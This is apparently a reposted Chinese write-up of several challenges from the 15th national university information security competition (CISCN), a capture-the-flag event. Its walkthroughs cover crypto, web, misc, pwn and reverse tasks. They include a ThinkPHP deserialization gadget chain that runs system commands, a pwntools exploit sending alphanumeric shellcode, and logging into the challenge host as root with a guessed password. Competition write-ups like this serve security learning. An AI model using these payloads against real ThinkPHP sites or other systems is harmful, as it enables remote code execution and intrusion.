国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

第十五屆全國大學(xué)生信息安全競賽部分WriteUp

這篇具有很好參考價值的文章主要介紹了第十五屆全國大學(xué)生信息安全競賽部分WriteUp。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

做了10個,都是爛大街的題目,分?jǐn)?shù)很低。CTF榜單186,以為穩(wěn)進(jìn)分區(qū)賽了。理論題算上變一千五百多名,華東南二百多名,進(jìn)不去了,WriteUp也不想上傳了。

Crypto

不是密碼選手,但密碼非預(yù)期搞出來幾個

簽到電臺

關(guān)注公眾號給的提示“弼時安全到達(dá)了”,查找這幾個字的中文電碼,然后和題目給的密碼本里的前28位密碼逐位相加除以10取余。如下:

第十五屆全國大學(xué)生信息安全競賽部分WriteUp

把取余后的,去掉空格后傳入msg就行:/send?msg=

ISO9798

nc上之后,會給一個sha256之后的字符串,和部分明文,讓求出前四位,用以下腳本即可得到前四位

from hashlib import *
hash='加密后的'
sss='部分明文'
table='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
for ch1 in table:
    for ch2 in table:
        for ch3 in table:
            for ch4 in table:
                hashvalue=sha256((ch1+ch2+ch3+ch4+sss).encode()).hexdigest()
                if hashvalue==hash:
                    print(ch1+ch2+ch3+ch4)
                    quit()

求出前四位后,填入。然后會要求輸入128字節(jié)的數(shù)字串,這里隨便輸入就行,然后返回一個96位字節(jié)的字符串。將這個字符串每32位分成一段,總共三段分別為rA、rB、B,然后將rB和rA拼接后傳入。舉個例子,這個96長度的字符串為112233,傳入2211即可,傳入后就出flag

基于挑戰(zhàn)碼的雙向認(rèn)證

讀了半天文檔,就是讓補(bǔ)全功能驗(yàn)證模塊,我不會,也看不懂那個C語言。ssh連接:ssh player@IP -p port,密碼也是player,連上后亂翻目錄翻到了root發(fā)現(xiàn)能進(jìn)去,閑的沒事翻來翻去,然后找到了flag,如下

cd /root/cube-shell/instance/flag_server
cat flag1.txt
cat flag2.txt

基于挑戰(zhàn)碼的雙向認(rèn)證2

flag就是上面那個flag2

基于挑戰(zhàn)碼的雙向認(rèn)證3

放這題的時候,官方好像發(fā)現(xiàn)了前兩道沒做權(quán)限驗(yàn)證的點(diǎn)。于是這個題加了權(quán)限驗(yàn)證,找到flag無法查看,這里本來沒有思路,提權(quán)也失敗。在嘗試獲取root權(quán)限時,su指令切換用戶,嘗試了很多密碼,自己的kali默認(rèn)密碼是toor,于是就試了一下,沒想到成功了。然后直接查看flag2就行,這個系列出的很奇怪,預(yù)期就是補(bǔ)全客戶端的驗(yàn)證模塊,幾個朋友也是預(yù)期做的。但是這個非預(yù)期太簡單了,幾道題沒啥意義了,出得很奇怪

Web

Ezpop

參考這個https://www.freebuf.com/vuls/321546.html

把腳本里的Poc里dir命令改成cat /flag.txt即可,如下

<?php
namespace think{
    abstract class Model{
        private $lazySave = false;
        private $data = [];
        private $exists = false;
        protected $table;
        private $withAttr = [];
        protected $json = [];
        protected $jsonAssoc = false;
        function __construct($obj = ''){
            $this->lazySave = True;
            $this->data = ['whoami' => ['cat /flag.txt']];
            $this->exists = True;
            $this->table = $obj;
            $this->withAttr = ['whoami' => ['system']];
            $this->json = ['whoami',['whoami']];
            $this->jsonAssoc = True;
        }
    }
}
namespace think\model{
    use think\Model;
    class Pivot extends Model{
    }
}

namespace{
    echo(base64_encode(serialize(new think\model\Pivot(new think\model\Pivot()))));
}

輸出結(jié)果base64解碼,然后Urlencode,結(jié)果傳給a參數(shù)以POST方式請求給index.php/index/test路由

示例圖如下:

第十五屆全國大學(xué)生信息安全競賽部分WriteUp

Misc

ez_usb

篩選usb.src=="2.8.1"導(dǎo)出特定分組為1.pcapng,篩選usb.src=="2.10.1"導(dǎo)出特定分組為2.pcapng

然后用UsbKeyboardDataHacker.py解析1.pcapng

第十五屆全國大學(xué)生信息安全競賽部分WriteUp

得到的字符串去掉<CAP>,然后去掉<DEL>以及前面的字母c,因?yàn)镈EL代表刪除,前面一個字母輸入也被刪了。然后剩下的字符串,通過如下腳本轉(zhuǎn)存為rar文件,我用HEX編輯器轉(zhuǎn)存的rar打不開,不知道啥原因

import binascii

hex_data = '字符串'
out = open('輸出的rar路徑', 'wb')
out.write(binascii.unhexlify(hex_data))
out.close()

這個壓縮包需要密碼,而密碼就是用UsbKeyboardDataHacker.py解析2.pcapng得到的字符串

輸入密碼即可得到flag

問卷調(diào)查

填寫完因?yàn)楣俜經(jīng)]買會員,人家不給交,哈哈哈笑死了。然后官方應(yīng)該是買了,提交問卷就給flag

Pwn

login-nomal

exp:

from pwn import*
context.log_level = "debug"
io = remote("ip","port")

io.recv()
shellcode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload = "opt:1\n" + "msg:ro0t1\n"
io.sendline(payload)
payload = "opt:2\n" + "msg:" + shellcode + "\n"
io.sendline(payload)
io.interactive()

注意一下shellcode寫法就行

Reverse

baby_tree

文本打開文件,把值拿出來就行??淳托辛烁鷖wift一樣硬看,可惜那個沒看出來,賽后和朋友交流發(fā)現(xiàn)寫法有很多,這里只放一個python寫的

res=[88,35,88,225,7,201,57,94,77,56,75,168,72,218,64,91,16,101,32,207,73,
     130,74,128,76,201,16,248,41,205,103,84,91,99,79,202,22,131,63,255,20,16]
key=[ord(c) for c in "345y"]

def my_encode(data,key):
    b=data
    k=key
    for i in range(len(b)-4+1):
        r0,r1,r2,r3=b[i],b[i+1],b[i+2],b[i+3]
        b[i]=r2^((k[0]+(r0>>4))&0xff)
        b[i+1]=r3^((k[1]+(r1>>2))&0xff)
        b[i+2]=r0^k[2]
        b[i+3]=r1^k[3]
        k[0],k[1],k[2],k[3]=k[1],k[2],k[3],k[0]
    return b==res

def my_decode(data,key):
    b=data
    k=key
    k[0], k[1], k[2], k[3] = k[2], k[3], k[0],k[1]
    for i in range(38,-1,-1):
        r1=b[i+3]^k[3]
        r0=b[i+2]^k[2]
        r3=b[i+1]^((k[1]+(r1>>2))&0xff)
        r2=b[i]^((k[0]+(r0>>4))&0xff)
        k[1], k[2], k[3], k[0] = k[0], k[1], k[2], k[3]
        b[i], b[i + 1], b[i + 2], b[i + 3] = r0, r1, r2, r3
    print("".join(chr(i) for i in b))

my_decode(res,key)

flag為:flag{30831242-56db-45b4-96fd-1f47e60da99d}

做了十個,解決50%,沒進(jìn)分區(qū)賽很煩。理論題這種設(shè)定讓人想開個泥頭車創(chuàng)創(chuàng)設(shè)計(jì)者!文章來源地址http://www.zghlxwxcb.cn/news/detail-456763.html

到了這里,關(guān)于第十五屆全國大學(xué)生信息安全競賽部分WriteUp的文章就介紹完了。如果您還想了解更多內(nèi)容,請?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 全國大學(xué)生信息安全競賽初賽writeup(歷年CISCN真題與解析)

    收錄了大佬們參加全國大學(xué)生信息安全競賽初賽的writeup和真題環(huán)境,方便學(xué)習(xí),排名不分先后,謹(jǐn)參考完整度和CSDN站內(nèi)優(yōu)先原則。 在此,對大佬們的分享表示由衷的敬意和誠摯的感謝! 第十二、十三屆全國大學(xué)生信息安全競賽——創(chuàng)新實(shí)踐能力賽原題 如果遇到打不開的鏈

    2024年02月06日
    瀏覽(46)
  • HNUCM信息科學(xué)與工程學(xué)院第五屆大學(xué)生程序設(shè)計(jì)競賽——正式賽

    簽到題 簡單dp,取前面第五天的3倍就行 這題被封了不記得什么題了 枚舉然后判斷回文就行了 簡單dp,不能跳的位置置0 算是一個簡單思維題吧,先考慮偶奇依次排列,然后發(fā)現(xiàn)可能會剩下偶數(shù)或者奇數(shù)。 如果剩下的是偶數(shù),因?yàn)榕紨?shù)不會影響前面的奇偶性,所以在末尾首先

    2024年02月08日
    瀏覽(19)
  • 第十八屆全國大學(xué)生智能汽車競賽——攝像頭算法(附帶個人經(jīng)驗(yàn))

    第十八屆全國大學(xué)生智能汽車競賽——攝像頭算法(附帶個人經(jīng)驗(yàn))

    參加了第十六,十七和第十八屆全國大學(xué)生智能車競賽,對攝像頭的學(xué)習(xí)有部分心得,分享給大家,三屆車賽,車賽生涯也算是到了盡頭。打算從基礎(chǔ)的算法開始,給各位一些個人看法,也是對車賽的一次總結(jié)。 閑話 :其實(shí)攝像頭的算法有很多種,弄了兩年攝像頭,也只是

    2024年02月07日
    瀏覽(18)
  • 第十八屆全國大學(xué)生智能汽車競賽室外賽5g室外專項(xiàng)賽(湘大隊(duì))開源

    ? ? ? ? 感謝十八屆全國大學(xué)生智能汽車競賽-室外賽的主辦方和組委會讓我們有了參加這次比賽的機(jī)會!當(dāng)我們在參加5g室外專項(xiàng)賽時,我們發(fā)現(xiàn)很多的組又很多的同學(xué)都是第一次參加智能車競賽對于智能車的了解還不是很深,對于代碼如何編寫需要哪些模塊也不是很熟悉,

    2024年02月20日
    瀏覽(25)
  • 第十四屆全國大學(xué)生電工數(shù)學(xué)建模競賽A題-高比例風(fēng)電電力系統(tǒng)儲能運(yùn)行及配置分析

    第十四屆全國大學(xué)生電工數(shù)學(xué)建模競賽A題-高比例風(fēng)電電力系統(tǒng)儲能運(yùn)行及配置分析

    ?寫在前面 博主:多次獲得華為杯,電工杯,小美賽等數(shù)學(xué)建模一等獎、二等獎,擁有較為豐富的比賽經(jīng)驗(yàn),會分享一些建模的思路、算法以及比賽經(jīng)驗(yàn)。 博主主頁: Born for的博客_CSDN博客-預(yù)測,數(shù)學(xué)建模,深度學(xué)習(xí)領(lǐng)域博主 希望大家多多關(guān)注,大家共同進(jìn)步! 目錄 題目背景

    2024年02月05日
    瀏覽(62)
  • 全國大學(xué)生網(wǎng)絡(luò)安全精英賽初賽(nisp一級)

    網(wǎng)絡(luò)方面 。 1.FTP端口號21 Sftp指的是ssh文件傳輸協(xié)議默認(rèn)端口號22. http端口號80 Https端口號443(http+ssl)(瀏覽器和服務(wù)器之間的加密協(xié)議) 發(fā)送郵件時,SMTP端口號是25,接收用到POP3技術(shù)。 共享文件夾端口445. 遠(yuǎn)程桌面端口3389 Telent

    2023年04月13日
    瀏覽(29)
  • 2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(9)

    801、近年來,我國面臨日趨嚴(yán)峻的網(wǎng)絡(luò)安全形勢,黨和國家高度重視信息安全建設(shè),關(guān)于網(wǎng)絡(luò)安全形勢的描述中,理解錯誤的是(() A.我國的網(wǎng)絡(luò)安全形勢差,但在黨和國家高度重視的情況下,面臨各種攻擊、威脅都能解決,發(fā)展穩(wěn)定 B.持續(xù)性威脅常態(tài)化,我國面臨的攻擊十

    2023年04月08日
    瀏覽(31)
  • 2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(2)

    101、通過“計(jì)算機(jī)管理”來清除時間日志也可以達(dá)到清除痕跡的目的,具體操作是() A.禁用“event system”服務(wù) B.禁用“net logon”服務(wù) C.禁用“event log”服務(wù) D.禁用“secondary logon”服務(wù) 正確答案:C 解析:通過“計(jì)算機(jī)管理”來清除時間日志也可以達(dá)到清除痕跡的目的,如果禁用“

    2024年02月05日
    瀏覽(28)
  • 2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(4)

    2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(4)

    301、Windows10各版本中,功能最少的是() A.家庭版 B.專業(yè)版 C.企業(yè)版 D.教育版 正確答案:A 解析:功能從少到多∶家庭版——專業(yè)版——教育版——企業(yè)版(教育版和企業(yè)版功能基本相同) 302、漏洞掃描技術(shù)是一類重要的網(wǎng)絡(luò)安全技術(shù)。它和防火墻、入侵檢測系統(tǒng)互相配合,能夠有

    2024年02月05日
    瀏覽(19)
  • 2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(全部試題)

    2022第三屆全國大學(xué)生網(wǎng)絡(luò)安全精英賽練習(xí)題(全部試題)

    1、某公司技術(shù)人員利于自己的技術(shù)入侵了某電商數(shù)據(jù)庫,將其中的用 戶數(shù)據(jù)下載后在暗網(wǎng)中進(jìn)行售賣,該行為的處置最適用的是以下那部法律?( ) A.刑法 B.網(wǎng)絡(luò)安全法 C.電子簽名法 D.勞動法 正確答案:A 解析:入侵他人網(wǎng)站,角觸犯的是刑法,不屬于民事責(zé)任 2、網(wǎng)絡(luò)環(huán)境日益復(fù)

    2023年04月09日
    瀏覽(34)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包